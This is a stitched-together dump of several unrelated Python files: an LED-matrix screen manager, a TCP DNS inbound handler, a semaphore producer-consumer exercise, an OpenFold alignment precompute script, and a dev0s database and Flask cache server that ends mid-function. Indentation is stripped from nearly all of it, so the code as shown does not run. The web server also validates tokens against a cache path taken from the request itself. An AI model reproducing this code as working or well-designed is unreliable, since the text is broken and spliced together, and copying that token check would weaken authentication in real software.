from .guiviewer import GuiViewer
from os import system
from time import sleep, process_time
from sys import argv
from threading import Thread
MAT_WIDTH = 64
MAT_HEIGHT = 16
class Screen:
"""
Screen is the Image manager for the plugins.
Each child is an Image and can be added with the 'add' method.
On each 'refresh' all children are flattened into one Image and sent to
the streamer.
Screen must have the same size as the matrix.
Keyword arguments:
width -- screen width in pixels (default MAT_WIDTH)
height -- screen height in pixels (default MAT_HEIGHT)
matrix -- output to serial (default True)
show -- print each frame to the terminal (default False)
guishow -- open the tkinter viewer on start (default False)
fps -- refresh-rate cap; 0 disables the limit (default 30)
tty -- serial device path (default '/dev/ttyACM0')
"""
def __init__(
self,
width=MAT_WIDTH,
height=MAT_HEIGHT,
matrix=True,
show=False,
guishow=False,
fps=30,
tty='/dev/ttyACM0'):
self.set_fps(fps)
self.show = show
self._types = ["image.Image", "text.Text", "slide.Slide"]
self._image = Image(width=width, height=height)
self.__streamer = Stream(matrix=matrix, tty=tty)
self.__childs = []
self.__prev_fps = 0
if guishow:
self.show_gui()
def check_type(self, element):
"""Checks if the element has a valid type to be added to screen
"""
for type_ in self._types:
element_type = "<class '" + __package__ + '.' + type_ + "'>"
if str(type(element)) == element_type:
return True
msg("Wrong type", 2, "Screen.check_type", type(element), level=0)
return False
def set_fps(self, fps):
if fps > 0:
self._fps = 1 / fps
else:
self._fps = 0
def add(self, element, name="default", **kwargs):
"""
Add a new Image to the children.
Returns True on success.
Keyword arguments:
element -- Image
x -- x paste location (default 0)
y -- y paste location (default 0)
refresh -- blank the child Image after each refresh (default False)
mode -- paste mode [Image.paste()] (default "fill")
name -- child name (default "default")
"""
x = kwargs.get('x', 0)
y = kwargs.get('y', 0)
refresh = kwargs.get('refresh', False)
mode = kwargs.get('mode', 'fill')
if self.check_type(element):
self.__childs.append(
(element.screen_data(), x, y, refresh, mode, name)
)
return True
return False
def insert(self, position, element, name="default", **kwargs):
"""Inserts a child to the screen before 'position'
Position can be a child name (first occurence) or an index
Returns True for success
Keyword arguments:
position -- Index or name to insert before
element -- Image
x -- x paste location (default 0)
y -- y paste location (default 0)
refresh -- blank Image after refresh (default True)
mode -- paste mode [Image.paste()] (default "fill")
name -- name (default "Child")
"""
x = kwargs.get('x', 0)
y = kwargs.get('y', 0)
refresh = kwargs.get('refresh', False)
mode = kwargs.get('mode', 'fill')
if self.check_type(element):
if type(position) == str:
for i, child in enumerate(self.__childs):
if position in child[5]:
self.__childs.insert(i, (
element.screen_data(), x, y, refresh, mode, name)
)
return True
elif type(position) == int:
self.__childs.insert(position, (
element.screen_data(), x, y, refresh, mode, name)
)
return True
return False
def replace(self, position, element, name='default', **kwargs):
"""Replaces a child at index 'position'
Returns True for success
Keyword arguments:
position -- Index or name to insert before
element -- Image
x -- x paste location (default 0)
y -- y paste location (default 0)
refresh -- blank Image after refresh (default True)
mode -- paste mode [Image.paste()] (default "fill")
name -- name (default "Child")
"""
x = kwargs.get('x', 0)
y = kwargs.get('y', 0)
refresh = kwargs.get('refresh', False)
mode = kwargs.get('mode', 'fill')
if self.check_type(element):
if type(position) == str:
for i, child in enumerate(self.__childs):
if position in child[5]:
self.__childs[i] = (
element.screen_data(), x, y, refresh, mode, name
)
return True
elif type(position) == int:
self.__childs[position] = (
element.screen_data(), x, y, refresh, mode, name
)
return True
return False
def remove(self, *names):
"""Delete one or more childs by their name
Returns True if a child was deleted otherwise False
"""
deleted = False
for name in names:
for child in self.__childs:
if name in child[5]:
self.__childs.remove(child)
deleted = True
return deleted
def remove_id(self, id_):
"""Delete a child by his id"""
if id_ <= len(self.__childs) - 1:
msg(self.__childs.pop(id_)[5], 0, "Removed", level=2)
else:
msg(
"no such child",
2,
"Screen.remove()",
len(self.__childs),
id_,
level=0
)
def remove_all(self):
"""Remove all childs"""
number_of_childs = len(self.__childs)
self.__childs = []
msg("Removed %i childs" % number_of_childs, 1, level=2)
def sleep_fps(self):
"""Rather precise (+0.00000x) fps waiter
"""
while (self.__prev_fps + self._fps) > process_time():
pass
self.__prev_fps = process_time()
def refresh(self):
"""
Flatten all children into one Image and send it to the streamer
and/or print it in the terminal.
"""
self.sleep_fps()
self._image.blank()
for child in self.__childs:
self._image.paste(child[0], x=child[1], y=child[2], mode=child[4])
# Refresh
if child[3]:
child[0].blank()
self.__streamer.set_data(self._image)
self.__streamer.send_to_serial()
if self.show:
system('clear')
print(self.__streamer)
def __str__(self):
count = len(self.__childs) - 1
string = color("Screen", "green") + "\n"
for n, child in enumerate(self.__childs):
if n < count:
string += color('├─', 'blue')
else:
string += color('└─', 'blue')
string += color(str(n), 'red')
string += color("..", 'yellow')
string += color(child[5], 'green', False, None, "Underline")
if child[3]:
string += "[" + color("1", "magenta", False) + "]"
else:
string += "[" + color("O", "magenta", False) + "]"
string += "\n"
return string
def __getitem__(self, index):
if type(index) == int:
return self.__childs[index]
elif type(index) == str:
for child in self.__childs:
if index == child[5]:
return child
def show_gui(self):
"""
Instantiates the tkinter gui and gets it running. The gui is updated
from within itself by a function that is run at the end of each
turn of the tkinter mainloop.
"""
gui_thread = Thread(target=lambda: GuiViewer(self._image))
gui_thread.daemon = True
gui_thread.start()
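# A minimal usage sketch (not part of the original module) showing the
# add/refresh flow described in the Screen docstring. It assumes the sibling
# Image class exposes the interface used above (width/height constructor,
# screen_data(), blank()); the size, fps and child name below are illustrative.
if __name__ == '__main__':
    demo = Screen(matrix=False, show=True, fps=5)
    logo = Image(width=MAT_HEIGHT, height=MAT_HEIGHT)
    demo.add(logo, name="logo", x=0, y=0)
    for _ in range(10):
        demo.refresh()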
|
tcp.py
|
import socketserver
import logging
import threading
import dns.message
import encrypted_dns.inbound_handler
from . import server
class StreamHandler(socketserver.StreamRequestHandler):
inbound_handler = None
def setup(self):
super().setup()
self.logger = logging.getLogger("encrypted_dns.inbound.StreamHandler <tcp://{}:{}>".format(
self.client_address[0],
self.client_address[1]
))
def handle(self):
"""
Read a length-prefixed DNS query from the TCP stream, pass it to the
configured inbound handler to resolve through outbound protocols, and
write the length-prefixed response back to the client.
"""
data_len_octet = self.rfile.read(2)
data_len = int.from_bytes(data_len_octet, byteorder='big')
wire_data = self.rfile.read(data_len)
self.logger.debug("Receive inbound msg: {}, from tcp://{}:{}.".format(
wire_data,
self.client_address[0],
self.client_address[1]
))
try:
dns_message = dns.message.from_wire(wire_data)
if self.inbound_handler is None:
    resp_msg = encrypted_dns.inbound_handler.InboundHandler.generate_failed_resp(dns_message)
else:
    resp_msg = self.inbound_handler.handle(dns_message, self.client_address)
resp_msg_wire = resp_msg.to_wire()
resp_msg_wire_len_octet = len(resp_msg_wire).to_bytes(2, byteorder='big')
self.wfile.write(resp_msg_wire_len_octet)
self.wfile.write(resp_msg_wire)
self.logger.debug("Sent resp msg: {}, to tcp://{}:{}.".format(
    resp_msg_wire,
    self.client_address[0],
    self.client_address[1]
))
except Exception as exc:
self.logger.error('Inbound exception caused by msg {} with error: {}'.format(
wire_data,
str(exc)
))
return None
@classmethod
def set_inbound_handler(cls,
inbound_handler: encrypted_dns.inbound_handler.InboundHandler
):
cls.inbound_handler = inbound_handler
class StreamInbound(server.Server):
def __init__(self,
host: str,
port: int,
fam: int,
inbound_handler: encrypted_dns.inbound_handler.InboundHandler
):
super().__init__()
self.host = host
self.port = port
self.addr_fam = fam
StreamHandler.set_inbound_handler(inbound_handler)
self.logger = logging.getLogger("encrypted_dns.inbound.StreamInbound <{}:{}>".format(
self.host,
self.port
))
self.thread = None
self.inbound_server = None
self.logger.info("Initialized.")
def _serve(self) -> None:
if StreamHandler.inbound_handler is None:
err_msg = "Cannot start the server; no inbound handler is set"
self.logger.error(err_msg)
raise RuntimeError(err_msg)
if self.addr_fam is not None:
socketserver.ThreadingTCPServer.address_family = self.addr_fam
self.inbound_server = socketserver.ThreadingTCPServer(
(self.host, self.port),
StreamHandler
)
self.inbound_server.serve_forever()
# server is shutdown at this point
self.inbound_server = None
def start(self) -> None:
if (self.thread is not None) or (self.inbound_server is not None):
err_msg = "Server is already started."
self.logger.warning(err_msg)
return None
self.thread = threading.Thread(target=self._serve)
self.thread.start()
self.logger.info("Server started")
def stop(self) -> None:
if (self.inbound_server is not None):
self.inbound_server.shutdown()
if (self.thread is not None):
self.thread.join()
self.thread = None
self.logger.info("Server stopped")
|
pl6_ex21.py
|
# -*- coding: utf-8 -*-
from multiprocessing import Process, Array, Semaphore
import random, time
MAX_SIZE = 1
buffer = Array("i", MAX_SIZE)
empty = Semaphore(MAX_SIZE)  # initially, MAX_SIZE free slots
full = Semaphore(0)  # initially, 0 occupied slots
def produtor():
while True:
nextProduced = random.randint(1,100)
empty.acquire()  # are there free slots?
buffer[0] = nextProduced
full.release()  # signal that a new slot is occupied
print("+++Produced " + str(nextProduced))
time.sleep(random.randint(0,3))  # rest for a bit
def consumidor():
while True:
full.acquire()
nextConsumed = buffer[0]
empty.release()
print ("---Consumi " + str(nextConsumed))
time.sleep(random.randint(0,3)) #descanso um pouco
prod = Process(target=produtor)
cons = Process(target=consumidor)
prod.start()
cons.start()
prod.join()
cons.join()
|
precompute_alignments.py
|
import argparse
from functools import partial
import json
import logging
import os
import threading
from multiprocessing import cpu_count
from shutil import copyfile
import tempfile
import time
import pickle
import openfold.data.mmcif_parsing as mmcif_parsing
from openfold.data.data_pipeline import AlignmentRunner
from openfold.data.parsers import parse_fasta
from openfold.np import protein, residue_constants
from openfold.data import data_pipeline
from utils import add_data_args
logging.basicConfig(level=logging.WARNING)
def run_seq_group_alignments(seq_groups, alignment_runner, args):
dirs = set(os.listdir(args.output_dir))
for seq, names in seq_groups:
first_name = names[0]
alignment_dir = os.path.join(args.output_dir, first_name)
try:
os.makedirs(alignment_dir)
except Exception as e:
logging.warning(f"Failed to create directory for {first_name} with exception {e}...")
continue
fd, fasta_path = tempfile.mkstemp(suffix=".fasta")
with os.fdopen(fd, 'w') as fp:
fp.write(f'>query\n{seq}')
try:
alignment_runner.run(
fasta_path, alignment_dir
)
except Exception:
logging.warning(f"Failed to run alignments for {first_name}. Skipping...")
os.remove(fasta_path)
os.rmdir(alignment_dir)
continue
os.remove(fasta_path)
for name in names[1:]:
if(name in dirs):
logging.warning(
f'{name} has already been processed. Skipping...'
)
continue
cp_dir = os.path.join(args.output_dir, name)
os.makedirs(cp_dir, exist_ok=True)
for f in os.listdir(alignment_dir):
copyfile(os.path.join(alignment_dir, f), os.path.join(cp_dir, f))
def parse_and_align(files, alignment_runner, args):
for f in files:
path = os.path.join(args.input_dir, f)
file_id = os.path.splitext(f)[0]
seq_group_dict = {}
if(f.endswith('.cif')):
with open(path, 'r') as fp:
mmcif_str = fp.read()
mmcif = mmcif_parsing.parse(
file_id=file_id, mmcif_string=mmcif_str
)
if(mmcif.mmcif_object is None):
logging.warning(f'Failed to parse {f}...')
if(args.raise_errors):
raise list(mmcif.errors.values())[0]
else:
continue
mmcif = mmcif.mmcif_object
for chain_letter, seq in mmcif.chain_to_seqres.items():
chain_id = '_'.join([file_id, chain_letter])
l = seq_group_dict.setdefault(seq, [])
l.append(chain_id)
elif(f.endswith('.fasta') or f.endswith('.fa')):
with open(path, 'r') as fp:
fasta_str = fp.read()
input_seqs, _ = parse_fasta(fasta_str)
if len(input_seqs) != 1:
msg = f'More than one input_sequence found in {f}'
if(args.raise_errors):
raise ValueError(msg)
else:
logging.warning(msg)
input_sequence = input_seqs[0]
seq_group_dict[input_sequence] = [file_id]
elif(f.endswith('.core')):
with open(path, 'r') as fp:
core_str = fp.read()
core_prot = protein.from_proteinnet_string(core_str)
aatype = core_prot.aatype
seq = ''.join([
residue_constants.restypes_with_x[aatype[i]]
for i in range(len(aatype))
])
seq_group_dict[seq] = [file_id]
else:
continue
seq_group_tuples = [(k,v) for k,v in seq_group_dict.items()]
run_seq_group_alignments(seq_group_tuples, alignment_runner, args)
# Debug: compute feature and save
def _parse_mmcif(feat_data_pipeline, path, file_id, chain_id, alignment_dir, _alignment_index):
with open(path, 'r') as f:
mmcif_string = f.read()
mmcif_object = mmcif_parsing.parse(
file_id=file_id, mmcif_string=mmcif_string
)
# Crash if an error is encountered. Any parsing errors should have
# been dealt with at the alignment stage.
if(mmcif_object.mmcif_object is None):
raise list(mmcif_object.errors.values())[0]
mmcif_object = mmcif_object.mmcif_object
data = feat_data_pipeline.process_mmcif(
mmcif=mmcif_object,
alignment_dir=alignment_dir,
chain_id=chain_id,
)
#_alignment_index=_alignment_index
return data
if (args.preprocess_feat):
print("Starting feature processing")
template_featurizer = None
feat_data_pipeline = data_pipeline.DataPipeline(
template_featurizer=template_featurizer,
)
if(f.endswith('.cif')):
for seq, names in seq_group_tuples:
first_name = str(names[0])
chain_id = first_name.split(sep="_")[1]
alignment_dir = os.path.join(args.output_dir, first_name)
data = _parse_mmcif(
feat_data_pipeline=feat_data_pipeline,
path=path, file_id=file_id, chain_id=chain_id,
alignment_dir=alignment_dir,
_alignment_index=None
)
# Save feat
pkl_dir = os.path.join(args.output_dir, first_name)
# try:
# os.makedirs(pkl_dir)
# except Exception as e:
# logging.warning(f"Failed to create feature directory for {first_name} with exception {e}...")
# continue
pkl_path = os.path.join(pkl_dir, "feat.pkl")
try:
with open(pkl_path, "wb") as f:
pickle.dump(data, f, protocol=4)
except Exception as e:
logging.warning(f"Failed to dump feature for {first_name} with exception {e}...")
continue
def main(args):
# Build the alignment tool runner
alignment_runner = AlignmentRunner(
jackhmmer_binary_path=args.jackhmmer_binary_path,
hhblits_binary_path=args.hhblits_binary_path,
hhsearch_binary_path=args.hhsearch_binary_path,
uniref90_database_path=args.uniref90_database_path,
mgnify_database_path=args.mgnify_database_path,
bfd_database_path=args.bfd_database_path,
uniclust30_database_path=args.uniclust30_database_path,
pdb70_database_path=args.pdb70_database_path,
use_small_bfd=args.use_small_bfd,
no_cpus=args.cpus_per_task,
)
#use_small_bfd=args.bfd_database_path is None,
files = list(os.listdir(args.input_dir))
# Do some filtering
if(args.mmcif_cache is not None):
with open(args.mmcif_cache, "r") as fp:
cache = json.load(fp)
else:
cache = None
dirs = []
if(cache is not None and args.filter):
dirs = set(os.listdir(args.output_dir))
def prot_is_done(f):
prot_id = os.path.splitext(f)[0]
if(prot_id in cache):
chain_ids = cache[prot_id]["chain_ids"]
for c in chain_ids:
full_name = prot_id + "_" + c
if(not full_name in dirs):
return False
else:
return False
return True
files = [f for f in files if not prot_is_done(f)]
def split_up_arglist(arglist):
# Split up the survivors
if(os.environ.get("SLURM_JOB_NUM_NODES", 0)):
num_nodes = int(os.environ["SLURM_JOB_NUM_NODES"])
if(num_nodes > 1):
node_id = int(os.environ["SLURM_NODEID"])
logging.warning(f"Num nodes: {num_nodes}")
logging.warning(f"Node ID: {node_id}")
arglist = arglist[node_id::num_nodes]
t_arglist = []
for i in range(args.no_tasks):
t_arglist.append(arglist[i::args.no_tasks])
return t_arglist
if(cache is not None and "seqs" in next(iter(cache.values()))):
seq_group_dict = {}
for f in files:
prot_id = os.path.splitext(f)[0]
if(prot_id in cache):
prot_cache = cache[prot_id]
chains_seqs = zip(
prot_cache["chain_ids"], prot_cache["seqs"]
)
for chain, seq in chains_seqs:
chain_name = prot_id + "_" + chain
if(chain_name not in dirs):
l = seq_group_dict.setdefault(seq, [])
l.append(chain_name)
func = partial(run_seq_group_alignments,
alignment_runner=alignment_runner,
args=args
)
seq_groups = [(k,v) for k,v in seq_group_dict.items()]
# Sort them by group length so the tasks are approximately balanced
seq_groups = sorted(seq_groups, key=lambda x: len(x[1]))
task_arglist = [[a] for a in split_up_arglist(seq_groups)]
else:
func = partial(parse_and_align,
alignment_runner=alignment_runner,
args=args,
)
task_arglist = [[a] for a in split_up_arglist(files)]
t0 = time.time()
print(f"Starting search and alignment")
threads = []
for i, task_args in enumerate(task_arglist):
print(f"Started thread {i}...")
t = threading.Thread(target=func, args=task_args)
threads.append(t)
t.start()
for t in threads:
t.join()
print("total time : {}".format(time.time() - t0))
logging.info("total time : {}".format(time.time() - t0))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"input_dir", type=str,
help="""Path to directory containing mmCIF, FASTA and/or ProteinNet
.core files"""
)
parser.add_argument(
"output_dir", type=str,
help="Directory in which to output alignments"
)
add_data_args(parser)
parser.add_argument(
"--raise_errors", type=bool, default=False,
help="Whether to crash on parsing errors"
)
parser.add_argument(
"--cpus_per_task", type=int, default=cpu_count(),
help="Number of CPUs to use"
)
parser.add_argument(
"--mmcif_cache", type=str, default=None,
help="Path to mmCIF cache. Used to filter files to be parsed"
)
parser.add_argument(
"--no_tasks", type=int, default=1,
)
parser.add_argument(
"--filter", type=bool, default=True,
)
parser.add_argument(
"--use_small_bfd", type=bool, default=True,
)
parser.add_argument(
"--preprocess_feat", type=bool, default=False,
)
args = parser.parse_args()
main(args)
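#
# Example invocation, as a sketch only: the script filename, the database locations and the
# flags contributed by add_data_args() are assumptions here, not values defined in this file.
#
#   python precompute_alignments.py /data/mmcif_files /data/alignments \
#       --uniref90_database_path /db/uniref90/uniref90.fasta \
#       --mgnify_database_path /db/mgnify/mgy_clusters.fa \
#       --bfd_database_path /db/small_bfd/bfd-first_non_consensus_sequences.fasta \
#       --pdb70_database_path /db/pdb70/pdb70 \
#       --cpus_per_task 8 --no_tasks 4
#
# When launched under SLURM, SLURM_JOB_NUM_NODES and SLURM_NODEID are read from the environment
# to shard the input files across nodes before they are split across --no_tasks threads per node.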
|
__init__.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# imports.
from dev0s.classes.defaults.objects import *
from dev0s.classes.defaults.defaults import defaults
from dev0s.classes.defaults.exceptions import Exceptions
from dev0s.classes.response import response as _response_
from dev0s.classes.requests import requests as _requests_
from dev0s.classes import code
import requests as __requests__
# the database class.
class Database(Traceback):
def __init__(self,
# the path to the directory (str) (#1)
path=None,
# root permission required.
sudo=False,
):
# docs.
DOCS = {
"module":"dev0s.database.Database",
"initialized":False,
"description":[],
"chapter": "Database", }
# traceback.
Traceback.__init__(self, traceback="Database")
# checks.
if path == None: raise Exceptions.InvalidUsage(self.__traceback__()+" Define parameter [path].")
# args.
self.path = gfp.clean(path)
self.sudo = sudo
# sys args.
self.__cache__ = {}
# attributes.
self.dir = self.directory = Directory(self.path)
# checks.
if not self.dir.fp.exists(sudo=sudo):
if self.sudo: _response_.log(f"&ORANGE&Root permission&END& required to create database [{self.path}].")
Files.create(str(self.path), sudo=self.sudo, directory=True, permission=700, owner=defaults.vars.user, group=defaults.vars.group,)
# copy objects.
self.fp = self.file_path = self.dir.fp
self.ownership = self.fp.ownership
self.permission = self.fp.permission
# copy functions.
self.join = self.dir.join
self.subpath = self.dir.subpath
self.fullpath = self.dir.fullpath
#
# load an object.
def load(self,
# the sub path (str, FilePath) (#1).
path=None,
# the data format [bool, str, int, float, dict, list] (str) (#2).
format="dict",
# the default data (bool, str, int, float, dict, list).
default=None,
):
if path == None: return _response_.error(self.__traceback__(function="load")+" Define parameter: [path].")
path = str(path)
subpath = path
path = gfp.clean(f"{self.path}/{path}")
format = self.__serialize_format__(format)
if default != None and not Files.exists(path):
response = self.save(path=subpath, data=default, format=format)
if not response.success: return response
try:
if format in ["bytes"]:
obj = Bytes(path=path, load=True)
elif format in ["bool"]:
obj = Boolean(path=path, load=True)
elif format in ["str"]:
obj = String(path=path, load=True)
elif format in ["int", "float"]:
obj = Integer(path=path, load=True)
elif format in ["list"]:
obj = Array(path=path, load=True)
elif format in ["dict"]:
obj = Dictionary(path=path, load=True)
except Exception as e: return _response_.error(str(e))
return _response_.success(f"Successfully loaded [{path}].", {
"data":obj,
})
# save an object.
def save(self,
# the sub path (str, FilePath) (#1).
path=None,
# the data to save (bool, str, int, float, dict, list) (#2)
data=None,
# the data format [bool, str, int, float, dict, list] (str) (#3).
format="dict",
# with overwrite disabled the dict format data is inserted into the existing data (bool).
overwrite=False,
):
if path == None: return _response_.error(self.__traceback__(function="save")+" Define parameter: [path].")
if data == None: return _response_.error(self.__traceback__(function="save")+" Define parameter: [data].")
path = str(path)
path = gfp.clean(f"{self.path}/{path}")
format = self.__serialize_format__(format)
try:
if not Files.exists(path=gfp.base(path)): Files.create(path=gfp.base(path), directory=True)
except ValueError: pass
try:
if format in ["bytes"]:
obj = Bytes(data, path=path)
elif format in ["bool"]:
obj = Boolean(data, path=path)
elif format in ["str"]:
obj = String(data, path=path)
elif format in ["int", "float"]:
obj = Integer(data, path=path)
elif format in ["list"]:
obj = Array(data, path=path)
elif format in ["dict"]:
obj = Dictionary({}, path=path)
if format in ["dict"]:
if overwrite:
obj.save(dictionary=data)
else:
if obj.fp.exists():
obj.load()
else:
obj.dictionary = {}
obj.insert(data)
obj.save()
else:
obj.save()
except Exception as e: return _response_.error(str(e))
return _response_.success(f"Successfully saved [{path}].")
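# A sketch of the overwrite semantics above (the database instance, sub path and data are
# illustrative only, not defaults of this class):
#
#   db.save(path="users/bob", data={"age": 30}, format="dict")
#   db.save(path="users/bob", data={"city": "x"}, format="dict")                 # overwrite=False: merged into the stored dict
#   db.save(path="users/bob", data={"age": 31}, format="dict", overwrite=True)   # replaces the stored dict
#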
# delete an object.
def delete(self,
# the sub path (str, FilePath) (#1).
path=None,
):
if path == None: return _response_.error(self.__traceback__(function="delete")+" Define parameter: [path].")
path = gfp.clean(f"{self.path}/{path}")
try:
Files.delete(path=path)
except Exception as e: return _response_.error(str(e))
if Files.exists(path): return _response_.error(f"Failed to delete [{path}].")
return _response_.success(f"Successfully deleted [{path}].")
# get the paths of a directory.
def paths(self,
# the sub path (leave None to use the root path) (str, FilePath)
path=None,
# get recursively (bool).
recursive=False,
# get files only (bool).
files_only=False,
# get dirs only (bool).
dirs_only=False,
# also get empty dirs (bool).
empty_dirs=True,
# get the full path (bool).
full_path=False,
# the banned full paths (list).
banned=[],
# the banned names (list).
banned_names=[".DS_Store"],
# the banned base names (list).
banned_basenames=["__pycache__"],
# the allowed extensions (list).
extensions=["*"],
):
# checks.
#if path == None: return _response_.error(self.__traceback__(function="names")+" Define parameter: [path].")
if path == None: path = self.path
else: path = self.join(path)
path = str(path)
if not Files.directory(path):
raise Exceptions.InvalidUsage(f"Defined path [{path}] is not a directory.")
# handler.
paths = Directory(path).paths(
# get recursively (bool).
recursive=recursive,
# get files only (bool).
files_only=files_only,
# get dirs only (bool).
dirs_only=dirs_only,
# also get empty dirs (bool).
empty_dirs=empty_dirs,
# the banned full paths (list).
banned=banned,
# the banned names (list).
banned_names=banned_names,
# the banned base names (list).
banned_basenames=banned_basenames,
# the allowed extensions (list).
extensions=extensions, )
if full_path:
return paths
else:
_paths_ = []
for i in paths: _paths_.append(self.subpath(i))
return _paths_
#
# get the names of a directory.
def names(self,
# the sub path (leave None to use the root path)
path=None,
# get recursively (bool).
recursive=False,
# get files only (bool).
files_only=False,
# get dirs only (bool).
dirs_only=False,
# also get empty dirs (bool).
empty_dirs=True,
# remove the extension names (bool).
remove_extensions=False,
# the banned full paths (list).
banned=[],
# the banned names (list).
banned_names=[".DS_Store"],
# the banned base names (list).
banned_basenames=["__pycache__"],
# the allowed extensions (list).
extensions=["*"],
):
# checks.
#if path == None: return _response_.error(self.__traceback__(function="names")+" Define parameter: [path].")
if path == None: path = self.path
else: path = self.join(path)
if not Files.directory(path):
raise Exceptions.InvalidUsage(f"Defined path [{path}] is not a directory.")
# handler.
return Directory(path).names(
# get recursively (bool).
recursive=recursive,
# get files only (bool).
files_only=files_only,
# get firs only (bool).
dirs_only=dirs_only,
# also get empty dirs (bool).
empty_dirs=empty_dirs,
# remove the extension names (bool).
remove_extensions=remove_extensions,
# the banned full paths (list).
banned=banned,
# the banned names (list).
banned_names=banned_names,
# the banned base names (list).
banned_basenames=banned_basenames,
# the allowed extensions (list).
extensions=extensions,
)
#
# representation.
def __str__(self):
return str(self.dir.fp.path)
def __repr__(self):
return str(self)
# sys functions.
def __serialize_format__(self, format):
format = str(format).lower()
if format in ["bytes", "Bytes", bytes, Bytes]: format = "bytes"
elif format in ["bool", "Boolean", bool, Boolean]: format = "bool"
elif format in ["string", "str", "String", str, String]: format = "str"
elif format in ["int", "integer", int]: format = "int"
elif format in ["float", float, Integer]: format = "float"
elif format in ["list", "array", "Array", list, Array]: format = "list"
elif format in ["dict", "dictionary", "Dictionary", dict, Dictionary]: format = "dict"
if format not in ["bytes", "bool", "str", "int", "float", "dict", "list"]: raise Exceptions.InvalidUsage(f"{self.__traceback__()}: Format [{format}] is not a valid option, options: [bool, str, int, float, dict, list].")
return format
#
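# Usage sketch for the Database class above (illustrative only; the root path and sub paths
# are examples, not defaults):
#
#   db = Database(path="/tmp/example-db")
#   db.save(path="settings/theme", data={"dark": True}, format="dict")
#   response = db.load(path="settings/theme", format="dict")
#   if response.success: theme = response.data
#   db.delete(path="settings/theme")
#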
# the webserver database object class.
# keeps all info in python memory only.
class WebServer(Thread):
def __init__(self,
id="webserver",
host="127.0.0.1",
port=52379,
sleeptime=3,
log_level=0,
# do not use.
serialized={},
):
# docs.
DOCS = {
"module":"dev0s.database.WebServer",
"initialized":False,
"description":[],
"chapter": "Database", }
# defaults.
Thread.__init__(self)
# check home dir.
for dir in [
f"{defaults.vars.home}/.{ALIAS}",
f"{defaults.vars.home}/.{ALIAS}/.cache",
]:
if not Files.exists(dir):
Files.create(dir, directory=True, owner=defaults.vars.user, permission=700)
# by serialization.
if serialized != {}:
self.assign(serialized, keys={
"id":"webserver",
"host":"127.0.0.1",
"port":52379,
"sleeptime":3,
"log_level":0,
})
# by args.
else:
self.id = id
self.host = host
self.port = port
self.sleeptime = sleeptime
self.log_level = log_level
# check parameters.
_response_.parameters.check(
# the parameters (dict) (#1).
parameters={
"id:str,String":self.id,
"host:str,String":self.host,
"port:str,String,int,float,Integer":self.port,
"sleeptime:str,String,int,float,Integer":self.sleeptime,
"log_level:str,String,int,float,Integer":self.log_level,
},
# the traceback id.
traceback=self.__traceback__(),).crash(error_only=True)
# attributes.
self.cache = {}
self.system_cache = Database(path=Files.join(defaults.vars.home, f"/.{ALIAS}/.cache/{self.id}/")) # only used for tokens, rest is stored in python memory only.
# checks.
self.log_level = int(self.log_level)
self.port = int(self.port)
self.sleeptime = int(self.sleeptime)
self.id = self.id.replace(" ","-")
self.tag = self.id.replace(" ","_")
#
# cache functions.
def set(self, group=None, id=None, data=None, timeout=3):
encoded = _requests_.encode({
"group":group.replace(" ","_"),
"id":id.replace(" ","_"),
"data":data,
"token":self.token,
"cache":self.system_cache.path,
"cache_id":self.id,
})
try:
response = __requests__.get(f'http://{self.host}:{self.port}/set?{encoded}', timeout=timeout)
except Exception as e:
return _response_.error(f"Failed to connect with {self.host}:{self.port}, error: {e}")
try:
response = self.__serialize__(response.json())
except:
return _response_.error(f"Failed to serialize {response}: {response.text}")
return _response_.response(response)
def get(self, group=None, id=None, timeout=3):
encoded = _requests_.encode({
"group":group.replace(" ","_"),
"id":id.replace(" ","_"),
"token":self.token,
"cache":self.system_cache.path,
"cache_id":self.id,
})
try:
response = __requests__.get(f'http://{self.host}:{self.port}/get?{encoded}', timeout=timeout)
except Exception as e:
return _response_.error(f"Failed to connect with {self.host}:{self.port}, error: {e}")
try:
response = self.__serialize__(response.json())
except:
return _response_.error(f"Failed to serialize {response}: {response.text}")
return _response_.response(response,)
#
# flask app.
def app(self):
app = flask.Flask(__name__)
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
@app.route('/get')
def get():
token = flask.request.args.get('token')
if token != str(Database(path=flask.request.args.get('cache')).load(Files.join(flask.request.args.get('cache_id'), "token"), format="str").data):
return _response_.error(f"Provided an invalid token {token}.").json()
group = flask.request.args.get('group')
id = flask.request.args.get('id')
if id in ["none", "null", "None"]: id = None
try:
if id == None:
tag = f"{group}"
value = self.cache[group]
else:
tag = f"{group}:{id}"
value = self.cache[group][id]
except KeyError:
return _response_.error(f"There is no data cached for {tag}.").json()
return _response_.success(f"Successfully retrieved {tag}.", {
"group":group,
"id":id,
"data":value,
}).json()
@app.route('/set')
def set():
token = flask.request.args.get('token')
if token != str(Database(path=flask.request.args.get('cache')).load(Files.join(flask.request.args.get('cache_id'), "token"), format="str").data):
return _response_.error(f"Provided an invalid token {token}.").json()
group = flask.request.args.get('group')
id = flask.request.args.get('id')
if id in ["none", "null", "None"]: id = None
value = flask.request.args.get('data')
if id == None:
tag = f"{group}"
self.cache[group] = value
else:
tag = f"{group}:{id}"
try: self.cache[group]
except KeyError: self.cache[group] = {}
self.cache[group][id] = value
return _response_.success(f"Successfully cached {tag}.").json()
@app.route('/active')
def active():
token = flask.request.args.get('token')
if token != str(Database(path=flask.request.args.get('cache')).load(Files.join(flask.request.args.get('cache_id'), "token"), format="str").data):
return _response_.error(f"Provided an invalid token {token}.").json()
return _response_.success(f"Active.").json()
#def run__(self, app, host, port):
# app.run(host=host, port=port)
#self.process = multiprocessing.Process(target=app.run, args=(self, app, self.host,self.port,))
#self.process.start()
app.run(host=self.host, port=self.port)
#
# control functions.
def run(self):
self.system_cache.save(path=f"{self.id}/daemon", data="*running*", format="str")
self.system_cache.save(path=f"{self.id}/token", data=String().generate(length=64, digits=True, capitalize=True), format="str")
self.app()
self.system_cache.save(path=f"{self.id}/daemon", data="*stopped*", format="str")
def fork(self, timeout=15, sleeptime=1):
if self.running:
return _response_.success(f"The {self.id} is already running.")
if self.log_level <= 0:
print(f"Starting the {self.id}.")
serialized = self.dict(keys={
"id":"webserver",
"host":"127.0.0.1",
"port":52379,
"sleeptime":3,
"log_level":0,
})
for i in ["__cache__", "cache", "system_cache" ,"_stder", "_traceback_", "_name", "_daemonic", "_ident", "_native_id", "_tstate_lock", "_started", "_stderr", "_initialized", "_invoke_excepthook", "__status__", "__running__", "__response__", "_is_stopped", "_args", "_kwargs", "_target", "_raw_traceback_",]:
try: del serialized[i]
except: pass
serialized = f"{serialized}"
